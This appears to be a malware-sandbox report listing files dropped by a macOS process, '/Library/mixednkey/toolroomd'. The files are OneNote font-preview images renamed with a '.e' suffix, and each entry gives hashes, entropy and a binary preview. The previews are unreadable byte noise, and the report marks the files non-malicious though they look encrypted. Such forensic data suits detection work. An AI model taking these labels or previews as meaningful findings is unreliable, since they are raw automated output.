.%`..n.4]....4...._]..]th:J#........ ...:-e.}.Z......P._2S...V.u...X...W.....(..J".. ..........@..I..H...b..%9Q`..&.UJ..\Z.U...Oh.Ad..G...11.'!.%.`..r.K...=('..d*..-.........[.._..\|..X-c.`;3i.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple Braille Pinpoint 6 DotRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2610
Entropy (8bit):	7.768101361471018
Encrypted:	false
SSDEEP:	48:EZvo6pOyizifCaL3PrkUdLevOXpRtNP4y4o5SNoZneHuIJF2yoyRBzENpq:wp0rAzrLCkNrSNoZeJjzEu
MD5:	D960576FBDC068FF79E543EEA305DEED
SHA1:	AD51116D42A349938661F23663BD1D83F0F47C77
SHA-256:	57E4C0413E7ECD694651C05D58BB66A9AE8623FA48697C223B235FDD526B92A4
SHA-512:	DED39ED286D868AC96C7CD4C3AA4AFB7EFDB896758BD951509A2F4F69225DD587F8527B861E9F84F02E623303B5F118D310E3158A222EF42DE2182FF3015BEEC
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.@..o.x.....94.)W.y..)%"A.4..W..g....S..fu.....q..G]w....`...-.....J..\|.q..{t.+.].Z._.........,....pHi.[.....%}.T\|.-....!q.f.CV...x.,...6.~...{..C]..n..s.c...R..{ ..%....i..a.B....nXd...).....A.F#..P.'.A"...K.V\|.T..V...i..)Q..x/p...\|.m....WU.D7.Y#..."..t..GL...J.;....t.....o....?1....4..!c4........_.c.q.m....l.a..,.....p... V......d./<..W>k8..7.n\|.7......o3.K.1pQ/2......4U........H..AXj..s.8...ar..,.....gZ)..,.A....."D9..EsOd..........G.Q.].3..B....\N...P.Nk.]...........mc..\|F..A...}..j......eq..PoB".<...M.d.......`!..&Jw?...j...f#..<....3...'..7.....5.j.Z..7].....+..Y...).vQ..h...C...g......}E.....S....!.5...Z....6D[.x%../.........V.x...j.x.........G.+/...:.k..$.P.....~$...1Wp...W..1.......7........Y@..rT.+..#+.3...5.)......+.....'.d.[..),_..._.YU^.y...Z..l......^...}...P..w9u'..\|\|?.\v.9...WQ@_.Q.....{...).....t..........'.$.9..8V{...w.&m.w...we.gTH;.C.h).^........,K..).8!.e0.L/.u..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple Braille Pinpoint 8 DotRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2506
Entropy (8bit):	7.74571599228149
Encrypted:	false
SSDEEP:	48:E2S20IIevlzHTx8bA9m7YKvgZt2APPyydn5pO456WNpq:BDHIm9yAw7rv+DjO45Fu
MD5:	725B697A41614619E3D66436862F753A
SHA1:	80870446F6545B7C79CF0D257B2E3E9E2FD3FFD9
SHA-256:	2B266DD4F06C571A06E0D7BB649048EB474554019EEBD47E3D107D3BCD1F965B
SHA-512:	DD2B6827A22CF15D8635457F1FB4E256BB6B001ADC1310C3143452D05DC9663D8C9A35D54503C38826A70CCB5898EDB564594B4E867B6A66780C404AC9E4DE2A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a/./.s..../~...[i&H.\|.`.B..8Ooj......C..,L....%...m..j0..n...1W...H,..A2..g<...;..%..P.....?`.C..C!.d.[.....?.JUsSuJZ..n.../u...].....n..UGQ.N..a.u1W/wy...s.....[..!y.),.A."....1X.....L..'.......r+E...{......x..rn..U&.).$.... ]MW....&..3...HV4.$....YI.2..&.?....3Q\...,<~.....F?].@.p.h\|.K%[.wM..{o........KU....(1.....YB...'cp4>Fh...;:.y~g.Yr.=A....{..V.M+x..J..l...2V.&..f.l\|.....~c....y?...,$..DO...A.o.O..xz..}.f.S......:.7k3.F<...F..{.....).N.">.u..:3.V9?.j.Nv"x....P^X.1c.e.._..r...CF.7.a\|.e....B9..^y<...R..p...C..q.F..O..\|a.........P.P=.#S.<..8..{2S4..2$..I...k.R..#...6.......J.O..c...'[.._E3\|L..'...._....:H._.c.fKZ..........qs..(.i8./.7w.........hL.S...N\tt..3G.Rf.s7,.&i..K.AB...J........i.kY.}$.m.mw...f.%C.{S<V...Cj4N...nY...s.B2Y.O.H..#jA@w.....M.[.....Y{.c..G~..W]......Lk.<w..g1...o.u................g".rqe....+.@...zvYCg..(..4.>..@[.UfxW..r>hwf..+.&p;...)}..G.fO;<.Ah..f{..jd.,.M..b. .}.....A.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple BrailleRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1522
Entropy (8bit):	7.510053452680468
Encrypted:	false
SSDEEP:	24:Ex9DqO/+wQWX8VnB0vIVAkbXRMpkwiRLbMkx5IBxUT9Z2VwbPtWsePc0m7:ExEC+w/XCrV/XR0iJHQxUr0IWNpq
MD5:	A337AEE5CFE42F134CC83FAEA9384BB4
SHA1:	877A2F12649797543D1846CC0712E834838A34CC
SHA-256:	AF9A9FE72B72BD881A25D4ABD5894BC42D693EDCD9770CA076A55CF122D1BFDA
SHA-512:	80FCF1AD34C87BCE432C5C22A8845B10C3E7E4ED840DD06C89D856CD8C31ACAE58398169D0A50E0585B9FE0A113AD5DA46676FC320FF7853DDA54C0C5E71028F
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.)E.BD._..Q.d...z.A...v.=.6k..Q[_.."\|.gR.2....A.<o.....E..<.x...<.x...1^...o...!>P. l.0...+.ok%N$.u]x.g..>.xK.U......F..o.s.Hg..8..J.(<=...C...q...Q.b....Qt...jxvu........0..DJ.....+._..d...j.EEb........%tLl..)...>..P.J`L. L.o....6S.......P...J.3{.T.C(..W..W.N...x.....W.C.......t6.p...h..R..H..HU.s..+..K....`.f.....h.<.D..s...5.}d.Q4...t.P.}..t...>[##.Z...].4..@...$....)i..;/....]..H.4......z..C....;U&....7.d..vC.R...3...a.x.J.I.8y.&.>.../HB..t.m"\....>....#...[..'...".>I8.z.O.xb<......}...(....8d...BO.t`. Z.y....jN,.F...d.^...X..l.!.....}..d.VT...hd............{5YOq...})....x.C.~..:.<..........Y../....4..I...l.......":.......8M.H.....8`g.\Y-..N..5.D:..ph.-..j`.@..............~.......M#.O..(%7..Bm/."0.....eVXl.........)Gv...w.HE..x.........("O.3.....L...v\....b.B..M2..J1..b..v&.:.G...?...&I.^.....(7......u.I..`.M.....V....()....=..*cXCq...U.Y.XAk=o"K.......O@y.ILQ....O../.c...

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple ChanceryChancery.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1770
Entropy (8bit):	7.587151575459754
Encrypted:	false
SSDEEP:	24:VZufF0lRGG9+udQ7KjZpee1tfqUQxocMGLuCnyzrL9vzoWTeZ9fm5Dh/XLvsePcx:+elb+uG74ZoenoaCnKLyUk9fmv7Npq
MD5:	005CB7887A52FF728759871F65942ED7
SHA1:	1D73D968587C2E845E87DDE92CEFEFB9CB579CF0
SHA-256:	22E0925FA9150E5203BE54DAC51624B12E6C2B5D536DAF8C372FF407F5A9231C
SHA-512:	38C5404D3F26274EF7DF51296DF83D8FEDE71D2C189B6D49D4EE89CAE8A086DA4BC9C9AC7C3FCA636F2811070FEBF6E667793A5D003050AA736BC66FAB43AEE6
Malicious:	false
Preview:	.<.\|.....f.A..1...N#. ..\.L.@..4-F+`..i .Y.a...k..K..8.9....D..t?tc...\M.{M\..+!72.dTajPL.jK..)...n.....U.....2z.....p...cT...}...E..J....c.4....g...Zs..V:...}g....v..8i%S.m.......{..K...Vk.N.....W......(..\|Dh.....Gz.X.u...}..P....._...E.m...{\b=.5......j{Ee&...o#k....z.,...g.m....gQ.r.J..x.4..%...O.\|M....@h..>.WEN.Z...r.X.hJr.....Ao..#L.....H.[s.Xg.Q@;..g..a.."&..Z....".')...5..i...=}D.K4?.U.......T.Co_..A..o..k..f>s.8.S.&....AM..=c..bg.....t.9d.G.o[qe...W.wk.ZV.V..J..[.l..{.^.>+y.=...H~.../....zx..O)....mp..#$........(...Pky..^x.;.(;.j}....T.WU....~..l_E.w"...]...w.E.r...e$......_..l,..[/'y....j.4..2..r....Iy_.5..b.'8.zM...."X.omW.Vdf.Z.._.]d.M....79.9.....0C......."..6. . VP....3..U.4.%.X....i..6..c....B...g.6..U...o.^8&.Y"..\|.5.EQfW..}..........0.......%.R..b.j=.D..EA.....h....>.3.E....s}.z.......%0...+.H!.h......I...A...J....{Os16.\.B.....L.(..Z...%..37+.Q%.U......0.cp..g.q.+..........&.lf.K#.t2..,Q.6jAt'..V........h....e..wl,.<..A..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple Color EmojiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1938
Entropy (8bit):	7.62740363307634
Encrypted:	false
SSDEEP:	48:ElbAl1ybsrVl1flL2KsreVO3ebdy93wwqCG484p5x9JtybNpq:wAYqbjVOGu3wMG48O9zou
MD5:	5EBB9ECBB82EF21695530B1661E855BF
SHA1:	73D07322E9BE9FC5207513E8F569464B08E90D22
SHA-256:	3DBE2000D82F5F339EE4A76FF64999CB9332A7AA8B92C7DE209D5C964647AAB4
SHA-512:	E056080E0AB473F8D947B27322941EE490500D3B28A30C78818DD8CE31B5A6BF9F2CF0629A86493EE92A66B9D4320E7C2A3EA13864C9E4BD23AB1B8D3E564213
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a1.mM...H.3...^...3.....M.M....c.8.s.......&..\|h.\%+.W.&=p....H.....5....P....l~=.....^M>.......h..tP.Q...................a.W&..\.7.3...S.i.q.cX...{.....H...\|a<o.;.\..$.B....OA...<...5.W..&....}...:R6...?...t%Y.`....v.F........l-.t.R..U.181hk.R`...i.k..J`7.../.p`..{I....(..........J....6....5.(...n..]....x.....&G...R...N..ar8.~.O.J.%.;.yZ.#...9i?.cDN..........9'..!.yo...kp!Mg..L;g...:u.y.N....l..>/fr.y.\|.[.eUWHw.g.~.r...5w>..e4.x..>..j....... .B....L..B..f....[.....^./.L...}M.AN..H.......8;...e........Zu.M~..Ps...:..z..&.D.3..-..YXH.%.....=)<......I..>.G...(.b...}r.$..1.....O.=....!..o ..\|u.}^\u.8....FG..f.....:...f./.C.#T.#T..m.d.6.;_4=..f..K.d.b...".5./...>...4.....6q....u4.K.u!i..;.8...0hW:..&..j.C.M..r..S.. .....$...g..........Y.rL$.........t....u...Z.R....]...`Y.....-.-r.bz(.Yy.\|..V!..;..R..h....4.V..5%l.FY...$.....hW..5.J....X...E..q$.Y%..9.Loox...t.>,Ff9....n.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple SD Gothic NeoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2050
Entropy (8bit):	7.6657972024993315
Encrypted:	false
SSDEEP:	48:EsLOjUpZugtC7Kj9hcXoIT4TXTypLANpq:/fpY2C7Kjyoi4TXTylAu
MD5:	B39046032A62D07ACEABFEB290D90519
SHA1:	CB99899AA2AEC0A8C386A133D6E7F0787CCAAF7E
SHA-256:	A3B98C1AF5C771A11AC49F771E4D1989D427CDEB990D5171D9963E6185BC3106
SHA-512:	57166AD4BD660C4DEA28980559AEA2D6D9A9CAF7AB1A30685F0A483172860A33455CE5E7853BBD1B0A665AFC78E7F948B7104C2E3B8AD82FB6611B2632A13FAB
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.al.o...i.6...T...H.A..I.$.>...?%.......I\|%..m...%...[..>...H.u.........u.N.E:..a&......V8.......d..b..H@..8.....8....<..)..D669:v...J.........A2.Sw...U.,.z.R..,z..`.o...u .Mm#6..cL.7..'.r.W...0...'.x.....5.E2..u.U5...xy........&up..X.....4.....d...DI.KI..k%4.2z.......G..t..U..u.5.p..c.'n..$.....1.....v./.{.....o.1\.G..@G......V........~.@....@...-.}.0..]yB$.......2...6.,@!..eOH<...$?.....s\....R.%I....q.A..!<l./...8A..j.P..V.?-.7!v....rd.&...Z.yS..X:..x#.e%9....,...g.e.....K....].......1..Hc..\|^..g.....E.z..u.=.^2.~.<..j@......n../..BV>.rj:k.[....O.9..6.R6Fv.7.....m........~j.Gf./...uyt.$$.O:.@.uk.qc.m....l.y>..tf.].xb%g...IL...Nn....-....z.Zh..HT...]..9<..L..=.P}...KG.\4.}.$.e.....aK1.....e........{..$........,..V.T.QD.....fz$........+$..v.........[....='.....Q.uB.0.W..*....z/.Q[i-.Z@.Q\|..Y3.;q.h._!...v..I...9.v0&.+....v.A.].?\.M(.i\.W..Xf........I.U..Y.."KR.....,3x.`..Q.4...I~h&.<..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple SymbolsRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1802
Entropy (8bit):	7.6110933666966805
Encrypted:	false
SSDEEP:	48:EddGJgReib7R52W+e0Sy7V2i864eZYNpq:YoJg5xohLc8Yu
MD5:	5076BB80B905BDCCCEFCC9E485814BAE
SHA1:	193DA11B2F8582201FA716DCE72E4C9A2DE0F6D0
SHA-256:	8AB60C6BF4F5AE5A0420C4DEB7A739BC320965D09DFD812505D3A1C15A06037A
SHA-512:	CC2E7FD99D6C447069200D44F329D63A7B9FA503F4B7845FC6D241CCA1642E28990AE706912D3F2E44D3E2CDE4FD68E1CE09E199F31F81F0D925C76F8FA4AEE1
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aGB.S.\....Fj.U..\|i....."...%%..b...^f.G....^...o.z....u.....S..$x..c..U%@j....g..+BR...^..y.....Y......3<m....b..w....o.?....o.?....o.?.S.,Zu...)o.....m..Le....7.....1C.&......g.J:t..@...D..2k.P..0.#LbY...8;...L.....7...[yu..\....&;41..n;h5u.....~=+..0....].Rb.77y........N...=zw.>.F....BBN...m..,.[pB.Q..Y......F...\?..d...d[mTK...LA}....L.G..%F...~s..T...L..J....m.!..S.. ..UM;..O..............J@.%K....>....}9E..f&....UgZ...~x..D{.2.!..+c..t..k-..wg.....x.....S..&C.=7m{G..\|...Gg..u..#.uS.t.jc.R.v...Y...6.G...AB.{...{.$.Kt.X.b...%......L.cn.YnaS...3R.cy..a..>...9..=..$....<N.......(...).....RtSO".$..........@..z.8.W......T1.f...r.f..r...:.{..v#"."S..v.B...x.-.......6F8...l.....b.....'R......:...^.7.."gO.:........^.t..h.5.x..!x.6(..W.H..)..Y.u9..A ..T.Vrf...\|..&.L..Bn....SF........3.bcV.}>\..\".}^.n.6.6....:k.,Rx.$....@n.aw.[a..z.W}..._e...^......"mo.f...1..:r...[Z.......+q.U...,6..,a..n1....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AppleGothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1410
Entropy (8bit):	7.4603549230549415
Encrypted:	false
SSDEEP:	24:E0jOHPcKMqQsfUmXYs911KyrlnLWccsD6v6k85KxPhqNLWsePc0m7:E0jOvcSfUgYiwELcs3k85sPhCaNpq
MD5:	178D1050090A99C2807B58D67ABEBEE9
SHA1:	9A825B0DB758C17C98B8889BDFFAAFBAA66CC6A6
SHA-256:	E2CC9E3D008EB8DE55774E5FCFF25ABF6457E0AB2B80D82E53A028FA5E17234D
SHA-512:	54AB55788C56CCBCD53A4C290E220C5E0B685AAAFEE567FA344030766C501C64A2AC6A6594CEF0FA3A0E6E57BBFB3DF90BE219124C28121551A42B0306C3E1AE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..9zN...SE.P....Y....{"_4D..G..;...3.Y..a..@G)^.~.2.^..f.{h..J.:...m.d]G.N.c......e..2..7X..\|...J.W.4..1(...K........^6..S...lss..EA........l[<S#.h...'.oq"..3...'1.....zra....#-...m....t..z...M.c;..y.pY.r..P..sF....>.!..K..Lq.9U.".........j..<..o,....L;m4.....N.."\..&.....8..W..1W.rku./..Z..L]jI.-..P..Pl..8m...B67..y&..s.....r...5.8.MW.....Q..*.......s&.z...WZ.....Ic.?.../.......s[!..~..2-e........t.e=.pS..@....D....`..$.J..e..p.oW....['...<..;#.&.'c.:.....\.C..........W-..o.........bD$..8-..`.WW.......q..F...8....].~.E_R....3P....8.8(......[.%.4q.7..\..9.^y....t.f ......0..a.5.0........)s9.#..../C.IB..;...u`c.(>..m=t2o..D...=+..s>..2.....F#.B.0..{..;...Ut_..H..K&\X..w...>.....N.Fb..>J.'...}.s9.Ji.3..Se../.m.6.\....2.B?..4....{....].vK.....f.../.S..8.p...G.1.c..D..P....G\|..z....U...h^.!....I//x.4....g#.,"..(YR.)M}d..0...&.d.\|m......K.L.....\)N..aR.C_$e\|...%.>a......(.pP....Z.....a5...L?o\

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AppleMyungjoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1826
Entropy (8bit):	7.613858451149612
Encrypted:	false
SSDEEP:	48:EH3IJTPPaXnaRW9zGhTlt3w+DXl3n+dzNpq:s3yTSXaOyhTlTDV3+dzu
MD5:	01162D772F5E51CDCB40D8318D7A1094
SHA1:	6681D1DF77DA91F3FAF3372701C6629EF0B0E48A
SHA-256:	D6149E08D1ACA55E2ED80C2ABC57603106672395C1746E80A337B28E9DA5C4CB
SHA-512:	CB391684E0A638F63ED37C799DE07A0853F926A42D5B06E942AE1D4E4246F702C3D7140A130D0937ED9869049CEFD6DE4A449C7AA69CFECF46DF3D71A85AC099
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a. .y.........7...K....8.g.'...YT1..`s..n4..QZ..r...].Z...4Q..%..HU.e8Wpg.uB.=v.l3P.A...GTm... ...\Na....6..=....6..=....6..=..A......^.>,..i....y..~......dX..!p.I....Xn.....~f.Umy-33fF..)........;....bG......&2.\|..1..\......C....X..S;........F$..[Z......7...D..D.O.!..,PZ`z:.ao.).[...+"B.E...@...(..1.......v.T.....=x_m%..sE..H..1.z&Q..8..`..q..[.~..9/...J..w....e.XO5aVo.. .....n_y.e)...&.I....{7m..Zg....... vy .CNYH..$.A...vfS.O....a...6..VZ......BP.jE...r...L[.P.C.\.B.@H[....[...@.0.y.T.;....c....\|.v...3.p$......06R...h..'.B.D&.F&.....H/.......1..)\gj.....,m..I....tc...\|.l>~.....%-.GS...p.,....J...6a6t.wSz.=..../.l......0w'..W5.Lv..1;\|N..f..(yj...5.....h.D.......v..{.Z.K..l.....=.u..m_.X.jlh-%.....6.M..c.r.6.!........d.....!..OF....D.......3.....T...K......65.v=.>.8w..Iy.t.Z.}.H.....L.Z...'.S!..... $.../.g.b6.2A..M./iZ..+)...^.....3........T}....&5.)J..xN...T7{M..W_...A...5.x.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Arial Hebrew ScholarRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2066
Entropy (8bit):	7.6807372298041
Encrypted:	false
SSDEEP:	48:EmV5ENv7omarSMW4MvpKml8NQP/zP9X0/BUGSoX2UNpq:h5mk9rrMKQ/zVi2GFX7u
MD5:	D66FD05FB561BA399256800B0EED00EC
SHA1:	B40AE4478E60F385AD0F316923956BC95DF9462F
SHA-256:	1506F29E7D2F7D53DC773E2EE41DAF825DC347FBAAAC012D0965FF958A95FDBC
SHA-512:	976D31BC6FB1CFCF00F6137111396B8B9CFB2E85426A155A4B45ABCEEB091FB97512D3BB8B7446C82D2BA1A50D3306535B5ED4C7DEC8FF55E53D24E60BA83A7E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...jU..6...T...g...G........6.\L..Y0R.JG............L.#3........b........ulp%.&....u:.>..+;.9@.i.....r..7..$.4.7..$.4h.V...<.w}..?.....\|3.'.W.L=.o.n...6G~3...;.....Z9...l{&+.......B.e.. .x....."..%.W..A!3..8........+..p....8...{..?...Gw......D.D._...W.i.:~O.H.!Z..,.E....w...9.7...;'Z.C....98.....Aq&..qZ...}.Q!..%................=."k..Y..@l....@.;(.....~.dM...7..\..hf..5.%.hG...4....+.......+l6K..3b...5'.R?Z.h....}l..5.....6f..v!.5.O.V'..X9.MP...R...,...U"...N...f6.A....q<.z6.....n.f...1Z%C....UC.5t.8......6d.4..L!S..E...,..o.n<.T..p......kN\|.x....li.X7&...+...S...@.K."M~."M....[h............. ..s.6....Gcq.Ba/VN"..%%1Xy.D..s.)_"..V........JQ%%#..7..?.....h.Y.j"?.....T.UOI 5..$.j.Z..\...8..I.D..>@.9.\|c.....q.e.;..i......D..]eO...Q..4..c ....$7..7X.nR......W..x4.1T...4.. .cU..L..k....&..U.....C...F.<..^...v.....l....62...th?.....\...W.0Vm........j..#..9........o..R.Y.,.>(.t_M.....S=..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Arial HebrewRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1530
Entropy (8bit):	7.525539900177263
Encrypted:	false
SSDEEP:	24:Ew8aNMc+onG2zh3hX6yFQuoVMvxGE0maFQusXI4wOe4Gcd9gGsePc0m7:EiNMctnGA3AyFQjVoxj0maQVXtH3Npq
MD5:	593AF7DE3A001D09FCD925F0B931B5DD
SHA1:	5D254BA4ED52CECAA3003FF774BDC7605F9D0666
SHA-256:	BDA7CE1D0B87787973D9C27FE8B2A4090B9F430610F32B560C939CEF21664EBA
SHA-512:	AEBEB5B065A0CE1CD433A4F7E16211049B72B9C6484E7838137F46D9A0AC6CA6BECFA01127342B71A49CE0E3AE525879D95BD4498B8C45308185D79085726957
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.G-RK.Y.Rc..=....K..O..].....)b.........N.g..j..".k...m.....E...5}..@....$H......^n/.M.D.o....,.r0%..OX.%.4...X...Y...,.&.K.UO.dK ........T.4....2{DH.....,.O..}\|H0a..._.qi.9. NG...\.Nq.o.UB.Ohd.&.O.&yh...c.......^..c.D...rE.RI..m\|bpS;...k.4.`>...9.l...V.....xv6.G...!.G9.U..v....V..P..4..)..=......vead..g...Q#.(b C..y..6^2<L...o..g..J+............k.....y.e.._..zJ.p5>.0..o...L:..{....he.O{.;...>..&...b...z.$./w.w7..~.......6....Z...I....x.j.{5.~.].........0..kd...S3c....$.C.t\S...bZ..5~E....W.......Y......8I`!.&.P.b.8.Z.j.j.._...\|...}W~..A.......7.....r..1.@.'..q...L....T.MCA.N..ec.?.Crx...J....j...pe..OJcR@.....{ ..X..."..kD..I..Q.....p.o....D~......z=...cd._...~sh.......?L..=..X...+.7[....5....[Z.O:..T.L.........?u.<.;.ag....b.@."..V.q...G.....4.0..@.C..rm~...\E!......jE...c...O..q......$%.Um;..KK.xG2...3d'..kR.....D.;V.e.....l.d=d.U...bqf.iUs.!..nR.+..... .f.%.v.........[...6..+...L...

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Arial Rounded MTBold.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2130
Entropy (8bit):	7.664248014092082
Encrypted:	false
SSDEEP:	48:EZz48ZeTFlnWY20bsFHaHEupwohgwVxvkNpq:GerN20QFHaHE0hjV5ku
MD5:	E688DBA0CE1B8C00EA99B8F4B02264EB
SHA1:	604B13DABEDF32B660D13C3FD0678F761F3EA3F7
SHA-256:	F58839EED5F4F6166CD82C9AC99C4B54A545737C8256055CA47FB14E27C475E9
SHA-512:	93C1B5CA14F39278FCE8CCF571C6463F9BD411B15CD376ACB58EBAACE9F42DC5FAEE34F279A9B5B0290438E6AE05553AE1491181CAA59D9B178D654B227F7CC0
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....\...^..".\|g.A.....I1Y.yk.(.... S{....9.9..q....e.Hld.?......^"...H..f.(..>..+..e.\..(.[..m......)D..B....B....B....B.....r.!sbTB+..u................C..k........D......0.u..t.~....x8...0L.pb.:.H.?\.I..?`{....../. .x.dl}..[... !..s..4...........K.M.....".Ue......Q2...7{b..<.$I...or..54.K.I.....!..#.....................l....F..3$i.o(....7/.:w..?\|v.1.....#.:.\|....*.i....66..i...,0. ..@.....r...eMN........HBT..k....B.!.;..4.x.ga.gc..'il..t.[.....l..X.U.#Q=...v)...~.g.. .`+....jJ!D..0.N.q...e..f...8..z..I....-'....'.T.Ypqf..Fi.m...j...H)V....5.'...f...t.]=....p.l)...........]..v8..#)..)K[.._..b......a.]......_.A....0...p....2.)?(.>.;o...F.Q..Ya..b.E@..?EO..L........ti.q.....)....{......W...{Z).....3....Y.....S.......ys&..Hj.b.U..lx..{j'.J..E.H3.R.O.........\...]-..~.L.h$:...\....hW..y....&..1..0....o].rv..A>.{2\|2.....t....f.$..l..h.N..P.&.Z..\|-..8..c..u.v0.....Q.y..T.A.<.F'f.BP.s

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Arial Unicode MSRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1826
Entropy (8bit):	7.6085763036567675
Encrypted:	false
SSDEEP:	24:EW9htnq57BIR8iiC0zQ/UxJmi6WVI1x7EguQTiS2VylKzsZsePc0m7:EWntn27WR94ln6W6xAXQrl0oNpq
MD5:	70594FA7913C735D611138F10D2C70E6
SHA1:	1CD4C2A34891F04E2CDD4D1BE0BA46F6A6B4CF8B
SHA-256:	FF25DDD3834AFB052B60C765EC81B838B695F17F5581758326FD49F4D07D8547
SHA-512:	1C455F993E39AE3801EDF35BBD7661DF48E7B3FBA25B2F44425DA90391CC53D8511D0A3CA6FF41344851153365D7486ACBC98ABAB1140018F49DA38390C5959E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.b.S..+...+tWJ.:. ....u......=&...s}......j!..T-]%..J..\..m]...e..y1Q........y...'.4.U....j.7.u.....,..t(gt.XY..[...XY..[...XY..[..sp..P.(..........H..\...B.8..ja(Z]~...].qmX.L...x..%..&I?.$L...X...6=...........?(..0..V..F...L=,!..(6c.......6.z....G...2.....yl3`.....8.Hk~...c...le.9..$.] ..]g..#W....)..5u#.O.......t._[.\g........wJ...x....'?D.....j..".R..U1.,...t ....m\|/....H...M>p-!.@.U...p.;....1^.z......V...qw....R...j.f.C.......n!JW..L>)}...'......\../.8R_b._. ..:.......e... ....\|.3i.7J^..I...v..-..ZxZ%..GX..$h...&.]q).\|..>..j}....\|H....+I}..m.X:..:...k.]?.....}.......>.&..1.K;..uAN...sz\|.Z..?.X]..4..U.......Z....$:!;2@... kCZ/p......W.k......<...&..fE...e..TtB.B;ZU{;nl........rV.R.........km 5De&.q...aZ..k.$...2......b[\|.j..#.......g.../..X.^.....T0x.x_...`&..$.../ZQY.h....'.....!.(.^......-.w.f.."N..+..Tr.^.u.6.z9l...K..,....Wg).#>.6.C.Y..J...R............J... (.,>...$.?./.......qt......

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ArialNarrow.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	7.129517247502441
Encrypted:	false
SSDEEP:	24:EWNZyD4sjh3Fe5+fY5eAyHXCILsePc0m7:EWNZPMNf/P3PNpq
MD5:	36EEF7CF45B25F59ED00F26CA6C55038
SHA1:	1841C23F8873DF930C980D5F14A10F065CBCDB3B
SHA-256:	2A095D9DC05B532ADD462B671C087C3480ABB8AEA1738A64FDE96A323A978E57
SHA-512:	9E12C6E4E821050C87ACA77552F496F1E8B1978ECA96F695E310D72C8C420D16EACD5EBEA568E13FD32CAABDD7F320F81181DECA39A00B182CE8FCBA53F86578
Malicious:	false
